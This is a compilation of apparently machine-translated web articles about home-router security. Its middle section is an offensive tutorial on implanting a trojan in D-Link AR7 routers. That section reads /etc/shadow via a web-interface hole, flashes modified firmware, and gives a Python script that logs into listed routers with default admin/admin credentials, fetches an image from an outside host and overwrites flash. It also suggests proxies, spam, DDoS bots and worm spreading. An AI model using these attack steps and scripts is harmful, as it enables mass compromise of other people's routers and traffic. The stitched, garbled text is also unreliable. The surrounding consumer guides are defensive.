Until recently, I did not even know that the Avast router scares its users with "scary" warnings regarding their routers. As it turned out, Avast antivirus scans Wi-Fi routers. It gives results that the router is not configured correctly, the device is vulnerable to attacks, or in general that the router is infected and infected, and attackers have already intercepted DNS addresses and are successfully redirecting you to malicious sites, stealing credit card information, and in general everything is very bad. All these warnings are, of course, seasoned with a dangerous red color and confusing instructions that even a good specialist will not understand without beer. I'm not talking about ordinary users. This is how the problems found on the D-Link DIR-615 router look like:
The device is vulnerable to attacks:
Of the solutions, of course, updating the firmware of the router. For what else 🙂 Avast can also display a message that your router is protected by a weak password, or the router is not protected from hacking.
In some cases, you can see a message that your router is infected, and connections are redirected to a malicious server. Avast Antivirus explains this by saying that your router was hacked and its DNS addresses were changed to malicious ones. And it also provides instructions for solving this problem for different routers: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys / Cisco, NETGEAR, Sagem / Sagemco.
In short, all of these recommendations are aimed at checking DNS addresses, and services associated with the DNS. Through which attackers can change the DNS on your router and redirect you to their malicious sites. There are detailed instructions on how to check everything on routers from different manufacturers.
How to respond to a warning from Avast about a router vulnerability?
I think everyone is interested in this question. Especially if you have landed on this page. If you are wondering how I would react to such warnings from the antivirus, then the answer is simple - no way. I am sure that Avast would have found holes in my router through which I could be hacked. I just have Dr.Web. He doesn't do those checks.
Maybe I'm wrong, but no antivirus other than Avast checks the Wi-Fi routers you are connected to for various kinds of vulnerabilities. And this feature, called Home Network Security, appeared back in 2015. In the version of Avast 2015.
Avast scans the router for device security issues. However, I don't fully understand how he does it. For example, how it checks the same password to enter the router settings. Follows the user, or the method of selection? If you picked it up, the password is bad 🙂 Well, okay, I'm not a programmer.
Personally, I believe that all these warnings are nothing more than simple recommendations for strengthening the protection of your router. This does not mean that someone has already hacked you and steals your data. What Avast offers:
- Set a good password and update the router firmware. They say otherwise you can be hacked. Ok, that's understandable. It doesn't have to be signaled as some kind of scary vulnerability. Although again, I don't understand how the antivirus determines that the version of the router software is outdated. It seems to me that this is impossible.
- The router is not protected from connections from the Internet. Most likely, such a warning appears after checking open ports. But by default, on all routers, the "Access from WAN" function is disabled. I highly doubt that someone will hack into your router over the internet.
- Well, the worst thing is the substitution of DNS addresses. If any problems with DNS are detected, Avast already directly writes that "Your router is infected!". But in 99% of cases it is not. Again, almost always the router automatically receives DNS from the provider. And all the functions and services through which attackers can somehow change DNS are disabled by default. It seems to me that very often the antivirus "understands" some user settings incorrectly.
Something like this. Of course, you may not agree with me. It seems to me that it is much easier to access a computer directly and infect it than to do it with a router. If we are talking about an attack via the Internet. I would be glad to see your opinion on this matter in the comments.
How to protect the router and remove the warning from Avast?
Let's try to deal with each item that Avast most likely checks and issues warnings.
- The router is protected by a weak password. There is no encryption. In the first case, the antivirus has a password that you need to enter when entering the router settings. Typically, the default password is admin. Or not installed at all. And it turns out that everyone who is connected to your network can go into the router settings. Therefore, this password must be changed. How to do this, I wrote in the article:. As for the Wi-Fi network password, it must also be strong, and the WPA2 encryption type must be used. I always write about this in the instructions for setting up routers.
- The router is vulnerable due to old software. This is not entirely true. But, if there is a new firmware for your router model, then it is advisable to update it. Not only to improve security, but also for more stable operation of the device and new features. We have instructions on the website for updating software for routers from different manufacturers. You can find through the search, or ask in the comments. Here's for .
- The DNS settings have been changed. The router has been hacked. To be honest, I have never seen such cases. As I wrote above, all services through which this can happen are disabled by default. Most often, the router receives DNS from the provider automatically. The only advice I can give is not to manually enter DNS addresses that you are not sure about. And if you specify addresses manually, then it's better to use only Google's DNS, which: . This is also advised in the Avast recommendations, which can be viewed on the official website:. There are detailed instructions for solving DNS problems for almost all routers.
That's all. I hope I was able to at least clarify these warnings in Avast antivirus. Ask questions in the comments, and do not forget to share useful information on this topic. Good luck!
Hello my reader! In this article, I will talk about wonderful ADSL routers.
- indispensable pieces of iron in home and industrial networks. I will tell you about the question
exploitation of these pieces of iron for purposes beneficial to us - sewing in a brutal
Trojan inside the router. And in such a way that no one notices
smart admin, no big-eared user.
Wishes or requirements for IQ
When I wrote this article, I assumed that reading it would be enough
an advanced user with GNU\Linux installed who also has some skills
work and programming in this operating system. However, it seems
possible to repeat my steps on Windows (using Cygwin, for example), but
it will not be described. For maximum enjoyment, you also need
soldering iron skills (this is optional).
And it all started...
Something I digress. So, it all started with how one day this very
piece of iron, or rather, it treacherously cut off the connection to the Internet and did not
wanted to restore it. At the same time, she was far away, physical access
she wasn’t there (however, I lied about something - I was just too lazy to get up from the couch
restart the router :)), the web interface did not respond, but I remembered that on
this thing should be telnet or ssh. Log in to the administration area
had not previously tried and recklessly changed the password to my account (as
it turned out later, in vain, because by default it is "admin: admin"). So I
tried SSH and it worked!
$ ssh [email protected]
$Password:
Like a bolt from the blue! Busybox! Never thought about under whose
this router is in control, it turns out - GNU / Linux! I got scared
I wonder how everything works here, and, mentally thanks to laziness and chance, I
embarked on research.
Collection of information
So where did I start? Of course, from the list of available commands:
#busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes
The set is quite sane, enough for normal research and implementation of ideas.
Next, interest arose in the kernel version:
# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le ( [email protected]) (gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006
For reference: MontaVista is a distribution focused on embedded
systems. The vast majority of network equipment manufacturers give away
preference for this system. It can also be found on other devices, for example, in
e-books or cell phones.
# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
processor
: 0
cpu model
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
wait instruction: no
microsecond timers: yes
extra interrupt vector: yes
hardware watchpoint: yes
VCED exceptions: not available
VCEI exceptions: not available
AR7 is a dual-core chip developed by Texas Instruments. He
contains a full-fledged ADSL router on a single chip that supports ADSL1 standards,
ADSL2,ADSL2+. Based on high performance MIPS 4KEc RISC processor, with
clock frequency 175 or 233 (depending on production technology: 18 µm
or 13 µm). The chip contains 2 UART interfaces on board, one of which (UART_A)
used to output debug information, as well as an EJTAG interface that serves
for debugging (firmware) Flash memory. About the use of these interfaces will be
described below.
Finally, I looked at the memory information:
# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat /proc/mtd
dev: size erasesize name
mtd0:0034f000 00010000 "mtd0"
mtd1:00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Naturally, not forgetting about block addresses:
# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
From the above, it followed that Flash memory (/dev/mtdblock) has 5 blocks:
mtd0- SquashFs file system image. This is a special file
a system that is compressed and read-only. For
compression algorithm is gzip, but in this case it is LZMA (compression ratio
above). The size of this block is 4 MB.
mtd1– this block contains the MontaVista core compressed by the LZMA algorithm
condition, block size 600 Kb.
mtd2– Bootloader ADAM2, performs kernel boot, also has
service FTP server for recovery and flashing. More about it will be
said further. The block size is 64 KB.
mtd3– shared between configuration data and environment
(environment variables) block, which can be viewed in /proc/ticfg/env.
The configuration data is in /etc/config.xml. An intermediary between the file
the system configuration block is closed (like all cm_* that control, o
them later) cm_logic program. The size of this block is also 64 KB.
mtd4- this contains the firmware signature, the kernel and the file image
systems. This block is used when updating the firmware via the Web interface.
Initially, it is stored in this block, then the checksum is checked
and, if it converges, is written to its new location.
RAM (16 MB in this model, but ADAM2 in this model
sees only 14 MB, is treated by an update), is mounted to the /var directory, and
can be safely used for our purposes:
# free
total used free shared buffers
Mem: 14276 10452 3824 0
Let's not forget to go over the list of processes. Of the interesting lurking here
daemons: thttpd - Web server; dproxy - caching DNS queries proxy server; ddnsd
- DNS daemon pppd... - the actual daemon that implements the protocol connection
PPP, and in the parameters we see account information. So, if the router is not
pretends to be a hose (read - not in bridge mode), then you can
easy to get an account.
The cm_* programs are proprietary and are already included in the source codes.
compiled (these programs are also developed by Texas Instruments, on D-Link
there is no need to swear for non-compliance with licenses).
cm_logic- a program that controls the logic of the system, through it
passes the configuration; synchronizes /etc/config.xml with
the corresponding part of the contents of /dev/ticfg (pointing to mtd3).
cm_cli– command line interface for management and configuration
systems. For example, connection settings are made through this interface.
cm_pc– launches and monitors processes, links with rules
(for example, run the program as a daemon, the rules also include information about
ports to open) as described in /etc/progdefs.xml; loaded immediately after
kernels.
webcm– The CGI interface is full of holes, for example allows you to look at /etc/shadow,
simply by accessing the URL.
http://192.168.1.1/../../../etc/shadow
Got nothing, thttpd is not so simple, but if so:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Another thing. This can be used to collect information if there is no access to
ssh/telnet, but there is access to the Web interface.
firmwarecfg- used for flashing via the Web interface. At the entrance
of this program, an image is transmitted by a POST request from the Web interface, and it is already
redirects to Flash-memory after checking the checksum of the image.
This completes the collection of primary information, it's time to move on to decisive
actions.
Installing Development Tools and Compiling Firmware
Firmware for D-Link routers (and all others based on GNU/Linux)
distributed under the GPL license, you can get them on the official
FTP server. In fact, you can choose any of the list of suggested firmware,
they are the same (regarding the T-series). In the delivery - the source code of the kernel, environment,
necessary tools and toolchain for developing/compiling existing
programs. It should be unpacked to the root and added to the environment variable
PATH path to toolchain's bin directory:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/
Now, to compile your own firmware, go to the directory
with source codes and execute this same make.
$ cd DSL/TYLinuxV3/src && make
Many questions will be asked about enabling device support (better
answer them in the affirmative). At the end of compilation in the TYLinuxV3/images directory
firmware images will be created. You can also run a script with the same name as yours.
model from the /TYLinuxV3/src/scripts directory.
A few words about transferring files between a router and a computer. The very first
the method I used is the ability to transfer files using the SSH protocol,
using the scp program for this. But a little later I found out that mc (Midnight
Commander) also has the ability to connect via SSH (Panel -> Shell connection).
Alternatively, you can set up a Web or FTP server at your workplace. Later I
gave preference to the Web-server, because it works most briskly. I installed
thttpd, small and fast, just like on a router. We launch at home and pull on
router file, after going to the /var directory (it, as mentioned
previously available for recording).
$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# wget http://192.168.1.2/file
To download a file from the router, you can also raise the Web server:
# thttpd -g -d /var -u root -p 8080
Pay attention, if you want to download an executable file from the router, you should
remove launch rights. When downloading a large number of files from the router
it's better to use mc, you won't need to copy the files to /var first and
remove rights, and then delete these files to free up space. In general, the matter
taste, choose any option that is convenient for you.
Creating your own program
Let's start, of course, with the classics of programming - HelloWorld. Some special
there are no rules. The text of the program is painfully familiar:
#include
#include
int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
return 0;
}
We compile (the path to the toolchain "and must be specified in the environment variable
PATH):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell
# cd /var
# chmod +x hell
# ./hell
And ... nothing will happen, or the path not found notification will fall out. What is
a business? I already talked about cm_pc earlier - this program launches others in
according to the rules described in /etc/progdefs.xml. Here comes the time
modify and flash the file system images.
File system modification
In order to modify the file system, you first need to
unpack. As I mentioned, the filesystem here is SquashFs with an LZMA patch.
The firmware development package includes only the mksquashfs program (for creating
image), unsquashfs (for unpacking) is missing. But it doesn't matter, everything is available
on the file system website, we need the first version. By applying the LZMA patch and
having collected utilities, we put them aside in a convenient place. First, let's get an image
file system from the router:
# cat /dev/mtdblock/0 > /var/fs.img
$ mkdir unpacked_fs
$unsquashfs fs.img unpacked_fs
Now you can modify as you like, but we want to throw FuckTheWorld into
directory /bin and add a rule to run in /etc/progdefs.xml.
$ cp hello unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
And add this (between the tags
Save and pack back:
$ mksquashfs unpacked_fs my_fs.img -noappend
Note that the file system image must not exceed
allowable sizes. If you feel like trying something urgently, and it doesn't
fits, remove from the image something "unnecessary" like grep, whoami, or
use the UPX executable packer. Now upload to the router
image and move on to the next section.
Capturing a File System Image
The way to flash the router is very simple, it consists in accessing the device
/dev/mtdblock/*. So, upload the file image to the router in any convenient way.
system and perform this simple action:
# cat my_fs.img > /dev/mtdblock/0 && reboot
# cp my_fs.img /dev/mtdblock/0 && reboot
After a while, when the recording process is over, the router will reboot, and
the changes will take effect. Let's try to run our example:
#hell
Mate.Feed.Kill.Repeat.
Ways to recover in case of failure
Before flashing the router with more serious "crafts", you should learn how
act in critical cases when the router refuses
load. There are no hopeless situations. ADAM2 FTP server comes to the rescue. For
first you need to run the FTP client on the ADAM2 IP address, which can be peeped
in /proc/ticfg/env (parameter my_ipaddress).
$ ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.
For clarity, you can turn on the debug mode, then all
information and all FTP responses:
Login / password - adam2 / adam2. The flashing process is very simple. To start
change the FTP session to binary mode:
ftp> quote MEDIA FLSH
Now we send, for example, an image of the file system and specify the location
destination:
ftp> put fs.img "fs.img mtd0"
We are waiting for the end of the recording, reboot the router, exit the session:
ftp> quote REBOOT
ftp>quit
All! As you can see, there is nothing difficult, now if something goes wrong, you
you can always make things right.
For convenience, you should give a normal IP address, enable
automatic download (so as not to dance with reset) and slightly increase the time
waiting for a connection before loading the kernel. All these settings are stored in
environment variables, there are special ADAM2 FTP commands: GETENV and SETENV (for
getting and setting a variable, respectively). In the FTP session, enter the following
commands:
ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp>quit
The router reboots and you can go to ADAM2 at 192.168.1.1:21. If a
there will be a desire to reflash the kernel image, and the kernel will refuse to boot, FTP
will start by itself. Before flashing with modified images, be sure to
save the current ones for recovery. In general, you can change environment variables
and via /proc/ticfg/env, I just wanted to talk more about working with FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env
And you can check the changes like this:
# cat /proc/ticfg/env | grep my_ipaddress
What to do if you want to try flashing the bootloader, and how
act in case of failure? Or the router for some reason does not start, and
no access to ADAM2? There is a way out - JTAG, or rather, EJTAG is present in this chip
(extended version). This is an interface for in-circuit debugging / programming.
To connect to this interface, we need the computer's LPT port,
connectors and 4 resistors. The scheme is simple.
I hasten to note that firmware via JTAG is not a fast business, it will take enough
a lot of time. So it should only be used to restore the bootloader,
even if it doesn't work. To communicate via JTAG, you should use a special
program such as UrJTAG. Below is an example of how this interface works.
Communication setup:
jtag> cable parallel 0x378 DLC5
jtag> detect
Flash Memory Detection:
jtag> detectflash 0x30000000 1
Reading Flash Memory:
jtag> readmem 0x30000000 0x400000 fullflash.img
Writing to memory (bootloader):
jtag> flashmem 0x30000000 adam2.img
It is also useful to know about the UART interface (I promised to talk about it earlier). AT
UART_A reports, that is, the bootloader logs (at an early stage of booting from
you can talk to him) and the core. When writing modified kernels, this
indispensable for debugging. UART - Universal Asynchronous Receiver/Transmitter
(universal asynchronous transceiver) is almost always present on
microcontrollers.
The adapter circuit is very simple. Based on only one chip -
TTL level converter: MAX232 for COM and FT232R for USB. Microcircuits
are quite common and there will be no problems with the purchase.
The circuit is assembled on a breadboard (which can be safely placed in a case
COM port connector) in 20 minutes and brings a lot of benefits. For example, when debugging
Kernels are an absolutely indispensable solution. And if the electronics are tight? Exit
are USB cords for old phones, they just have a converter
UART - USB.
Some distribution ideas
Your proxy/socks on someone else's router is great. As, in fact, spamming
over all protocols router. This is not a Windows computer for you.
rearrange every month :). Routers often do not change or reflash. Yes and
who, besides us, would come up with the very idea of infecting a router?
Don't forget, we control all traffic from the user/network. For more
powerful routers and it is already possible to hang a DDOS bot. Hide file/hide process,
intercept writing to mtd blocks, eliminating the erasure of our program - everything that
whatever!
Let's say you are going to start writing a serious program for a router.
Very good debugging is important, you will probably have to do it a lot of times
rewrite/restore images... This is a very sad prospect. Even hands
slightly lower, if we also take into account that the rewriting resource of Flash memory
small (more details in the documentation for the memory chip), and there is a prospect
ditch her. But there is a way out! Qemu can emulate AR7! Can you imagine what
does it provide opportunities and limitless convenience? Now there's nothing to stop us
write something incredibly cool!
So. You wrote a program, checked it on your own or 1-2 other people's routers, but
the whole network is still ahead, manually infecting is a chore, on the 10th router you are already starting
curse the whole world, and floats in the eyes from the strings of "cat" and "mtd". Let's write
program to automate these routine actions. I chose the python language.
The work plan is:
- compiling a list of routers, for example, using nmap;
- the script should take IP addresses from the list in order, enter through
telnet with standard login/password; - then the same actions: upload the modified image,
overwrite, reboot.
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib,time
SERVER="http://anyhost.com/fs.image"
for addr in open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Password:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reboot")
telnet.close()
The logic of the script is very far from ideal, now I will explain why. For
first you should check the firmware / kernel version and the router model, because there may be
major differences in performance. Further, instead of firmware blanks, you should download
file system image from the router, unpack, modify and send
back. This will eliminate compatibility issues with different
models / firmware versions, because the stability of work is the most important thing for you.
Also, a virus can have the functions of a worm, and if you wish, you can always
attach a network scanner to it, brute force for RDP and similar chips.
There is another great distribution method. Nothing stops you from writing
program for Windows, which will have with you (or download from your
server) image of the file system and infect the router with it, if it is present.
Distribute this program in all "standard" ways: removable drives,
exploits for programs, infection of other programs... Combining these methods,
could be a major pandemic. Just imagine this picture
such devices are ubiquitous.
Router protection
After digging through all this, I thought: how can I protect the router? And then, you see,
I'll get myself. The first step is to change the user password to a more complex and
long (limit - 8 characters), change banners and service greetings
(with a hex editor, or, preferably, recompile programs) in order to
nmap or other scanners could not determine the versions of the services.
You should also change the ports on which the demons hang. This is done through
modifications to progdefs.xml. Kill telnet (the easiest way to pick up a password for it, yes
and the protocol is insecure, why do we need it), turn on the firewall, allow the connection
to services only from its own IP or MAC address. Also use a firewall
to protect a network or a computer, it is not in vain that it is present. Competent setting
Rules will always help to protect.
Conclusion
Many, not only D-Link routers and other similar devices are built on
AR7 chip, the list includes Acorp, NetGear, Linksys, Actionec... Pretty
this AR7 is popular along with MontaVista. It follows that, using the same
toolchain, without any problems, you can carry out the steps described in the article.
Think about it: in addition to harmful actions, you can also do something useful / pleasant for yourself.
and others (I do not argue, the pleasure of hacking cannot be replaced, but still).
You can make your own firmware, for example, more powerful routers capable of
download / distribute torrents ... All models have a USB 1.1 interface, but in the younger
models it is not soldered. Add a USB module and a file system driver to the kernel,
equip the router with Flash memory - and as a result, you get a kind of network storage for
little money. There are a lot of options, and ideas should arise in thousands - not
limit yourself, create and create!
In light of the increasing cases of DNS spoofing by malware on the devices of Internet users, the question of the security of Wi-Fi routers arises. How to check the router for viruses? How to remove a virus in a router? The question is complex and simple at the same time. There is a solution!
The virus itself cannot write itself to most modern routers due to the small space in the memory of the router itself, but it can zombify the router to participate in a botnet. As a rule, this is a botnet to attack various servers, or to redirect and analyze the flow of information leaving you on the Internet.
Your passwords and personal correspondence can fall into the hands of intruders!
This needs to be corrected as soon as possible.
- Reset router settings
- Router firmware
- Reconfiguration
Reset router settings
You can reset the router settings by pressing the reset button. Usually this button is located on the back of the router, where the LAN ports are. Usually the button is recessed into a hole to avoid accidental pressing, so you have to use a toothpick. it will delete the router settings changed by the virus, and install the factory ones in their place. I must warn you that if you do not know how to configure a router, then dump its settings to you not worth it!
Router firmware
Sometimes the virus "floods" modified firmware to the router. You can remove virus firmware from the router by flashing the router again.
Connect the computer to the router with a LAN cable. LAN cable is included with any router. Or via Wi-Fi, if there is no possibility of a cable connection. It's better to connect with a cable! The wireless connection is considered unstable and is not suitable for router firmware.
After we have connected to the router, open the browser (Chrome, Opera, Mozilla, IE) and enter the address of the ASUS router in the address bar, for Asus it is 192.168. Login: admin, Password: admin. If the username and password do not fit, then ask the person who set up your router, maybe he changed them.
Download the firmware from the manufacturer's website and select the firmware on the disk using the router settings page. For the vast majority of routers, the firmware steps are the same.
Problems when distributing Wi-Fi using a router arise for various reasons. One of them is the infection of the distributing device with a virus, which you can get rid of on your own.
- a virus that slows down the speed of the Internet in various ways. For example, such malicious software knocks down the firmware settings or starts downloading some advertising virus content to the computer;
- a virus that replaces website addresses. It looks like this: a user visits any known safe site, and the virus changes the DNS in such a way that the user gets to an advertising site or sees advertising banners where the site owners did not place them. Such a virus is also dangerous because it can transfer you to a site containing other viruses.
In any case, if you notice the incorrect operation of the router, you should check it for viruses, especially since it is very easy to get rid of them.
How does a virus get into a router
The router provides Internet to all devices connected to it. This means that all devices and the router itself are on the same home network. This is what the virus uses: it enters the computer from some site or downloaded file, and then it is transmitted over the network to the router, where it starts to play dirty tricks. The process depends on the virus model, for example, some malware do not specifically detect themselves on the computer, but begin to act only when they get into the router, while others manage to harm both the operating system and the router firmware at the same time.
Checking the router
Before cleaning the router from viruses, you need to check if they are on it. To find out the result, you need to use the Internet directly through a computer. That is, remove the WLAN cable or modem from the router and insert it into the computer port, and then follow these steps:
If you are experiencing speed issues, then follow these three steps.
- Check your internet speed. This must be done in order to find out in the future whether the speed is the same when using the network directly and through a router. For example, you can download a file or use the special online service Speedtest.
We scan the speed of the Internet through the site Speedtest
- To more accurately determine the quality of the signal, you need to know the ping rate. Ping is the time it takes for a signal to be sent from your device, reach the server, and return back. Naturally, the larger it is, the worse it is for you. Open a command prompt, type in the ping ip command and run it. The IP address of your connection, the default is usually 192.168.0.1, but may vary. Remember the result. A normal ping value of up to 40 ms is an excellent indicator, 40-110 ms is a normal average value, more than 110 ms - you should think about reconfiguring the network, improving the signal or changing the provider.
Execute the ping ip command
- After the list of sent packets, you will see statistics. You are interested in the “Packets” line, it counts how many packets were sent, lost, completed. If the number of lost packets exceeds 5%, you need to find out what the problem is. If a large number of packets do not reach the server or return, this will greatly affect the speed of the Internet.
See what percentage of packets are lost
After you describe all the above steps, get detailed information about ping, the number of lost packets and Internet speed, reconnect the WLAN cable or modem to the router and check all the same indicators when connected via Wi-Fi. If the parameters are approximately at the same level, then the problem lies not in the router, perhaps the reason is on the operator's side. Otherwise, if problems with the Internet only occur when using it through a router, you need to perform a factory reset and virus cleaning.
Virus Removal
To remove the virus, you need to reset the settings to the default values. If the virus managed to damage the firmware, you will have to install it again yourself.
Reset options
- Look for the Reset button on the back of the router. Usually it is smaller than all the others. It needs to be held down for 10-15 seconds. When the router turns off and starts to reboot, you can release it. Rebooting the router will notify you that the settings have been reset. Please note that the set password will also be lost.
Press the Reset button
- To reconfigure the router, you need to connect it to the computer via cable, and then open the browser and go to http://192.168.0.1. Perhaps the address will be different, you can find it on a sticker located on the router itself, or in the documentation that came with the router. You will be asked for a login and password, by default the login is admin, and the password is admin or 12345. For more details, see the instructions for the router.
- Go to quick setup. Specify the options that suit you. If you want, set a password and change the name of the network. After going through the setup procedure, save the changes and reboot the router.
Go to the "Quick Setup" section and set convenient settings
After completing all the above steps, check if you got rid of the error. If not, then you will have to reflash the router manually.
Flashing the router
The firmware of the router is possible only if the device is connected to the computer with a cable. You cannot update the firmware over Wi-Fi.
- There is a sticker on the back of the router. Find your router model on it. It also contains information about the version of the firmware installed initially. If its version is 7, then it is better to install the update for version 7 in order to avoid conflicting too new firmware with the old hardware of the router.
Find out the firmware version and model of the router
- Go to the manufacturer's website and use the search box to find the right version for your model. Download it to your computer.
Find and download the required firmware version
- The downloaded file will be archived. Extract its contents to any convenient folder.
Specify the path to the firmware
- Start the update procedure and wait for it to finish. Reboot your router. The firmware should be updated, and all problems and viruses are most likely gone.
We are waiting for the installation to finish
Video: how to flash a router
How to protect your router from viruses in the future
The only way to protect the router from viruses is to prevent them from penetrating the computer. Your computer is protected by antivirus. Install and under no circumstances disable any modern antivirus. It is almost impossible to catch malicious software with an activated antivirus. It is not even necessary to use paid security programs, in our time there are enough high-quality free analogues.
What to do if nothing helped
If the implementation of all the above instructions did not bring the desired result, two options remain: the problem occurs due to a breakdown in the physical part of the router or errors on the provider's side. First, you should call the company that provides you with the Internet and tell them about your problem and the methods that have not helped to solve it. Secondly, the router should be taken to a special service to be examined by specialists.
Router virus infection is rare, but dangerous. There are two ways to get rid of the virus: resetting the settings and updating the firmware. You also need to make sure that the malware has not remained on the computer.
During the distribution of the Internet via Wi-Fi through a router, various problems may appear. For example, slowdowns and high ping may occur due to viruses infecting the distributing equipment. Let's take a closer look at how to clean the router yourself.
Symptoms
Equipment can be infected with the following types of viruses:
- slowing down the data transfer rate. For example, a virus is capable of knocking down settings, there will be low speed, signal loss, etc.;
- substituting site addresses. It happens like this: a person goes to a resource, and a malicious program changes DNS, and the user is redirected to a site with ads or ad blocks placed by site owners become visible to him. This virus is also dangerous because it can redirect to a resource that contains other malicious content.
In any case, if the router is unstable, it is necessary to check it for viruses, which are quite easy to remove.
How does infection occur?
The router distributes the Internet to all gadgets connected to it. This means that all devices operate on the same local network. The virus uses this: it enters the computer through a website or a downloaded file, then through the network it enters the router, where it performs malicious actions.
The severity of the situation depends on the version of the virus program, for example, some pests behave secretly and begin to act actively only when they are in the router, while others, on the contrary, can damage the operating system along the way.
Checking network equipment for infection
Before cleaning the equipment from viruses, you need to check the router for their presence. To do this, you need to connect the Internet cable to the computer port directly. Pull the WLAN wire out of the router and connect it to the computer, and then perform the following manipulations:
- Launch your browser and open several sites. Make sure that their content is correct and that there are no substitutions of sites, ad units. For the purpose of verification, it is better to choose resources in which the presence of advertising cannot be.
- Start scanning your computer with an antivirus program. This is necessary to determine the route of infection - from a computer or from a router. Keep in mind that there may be several viruses, and they may be present both in the system and in the network equipment.
Virus Removal
Watch a video about infecting a router with viruses here:
To remove the malware, you need to reset the settings to the original. If the virus program has already harmed the firmware, it will need to be reinstalled.
Reset options
To clean the router, you need to reset its settings:
- Find the Reset button on the back of the device. She often stands out from the crowd. Hold it down and hold until the router resets and reboots. Remember that when you reboot, all settings will be lost, and the router will need to be configured again.
- To configure the router, you need to connect it to the computer using a cable, then launch the browser and type the address 192.168.0.1. It may be different and is indicated on the router itself or in the documents for it, in the instructions. When entering the settings, they often enter the admin login, and the password is the same or 12345. If you failed to enter, then you should look into the instructions for the network equipment.
- Find quick settings options. Select all applicable items. You can also change the password and network name. After completing the configuration process, save them and reboot the router.
After completing all the steps described, check if you managed to get rid of the problem. If not, then you will need to flash the network equipment.
How to perform a flashing?
It happens that a virus program changes the firmware on the router. You can neutralize the infected version by flashing it.
Connect your computer to the router via LAN wire. It should be included with any router. If not, then you can use a Wi-Fi connection. However, a cable connection would be preferable.
After connecting to the router, launch the browser and enter the value 192.168.1.1 (or another one specified on the device itself) in the address field, then you will need to enter the password and login to open the router settings. The default username and password is admin. If you can’t enter the settings, then you need to find out the current login details, perhaps they were changed after the last installation.
Download the new firmware version from the manufacturer's website and go to the router settings and select it on the computer disk. The firmware process for all routers is identical.
Protection of network equipment from viruses
To protect your router from infection, you can use the following recommendations:
- Update the firmware to the latest version. Visit the manufacturer's website, search for your model and download the latest firmware.
- Set a multi-valued password value on the web interface. Not all routers allow you to change your login. However, if you set a complex password, it will not be easy to hack the web interface.
- Set offline login in router settings.
- Change the IP address of the router in local access. During the hacking process, the virus will immediately access addresses such as 192.168.0.1 and 192.168.1.1. Based on this, it is better to change the third and fourth octets of the LAN IP address.
- Install a reliable antivirus program on your PC. If the virus first tries to enter the computer, it will be removed immediately, which will prevent it from harming the router.
- Do not store passwords in the browser.
As you can see, checking the router for viruses and cleaning it is easy. But it is better to follow simple tips to prevent infection. But if this happens, you know what to do.
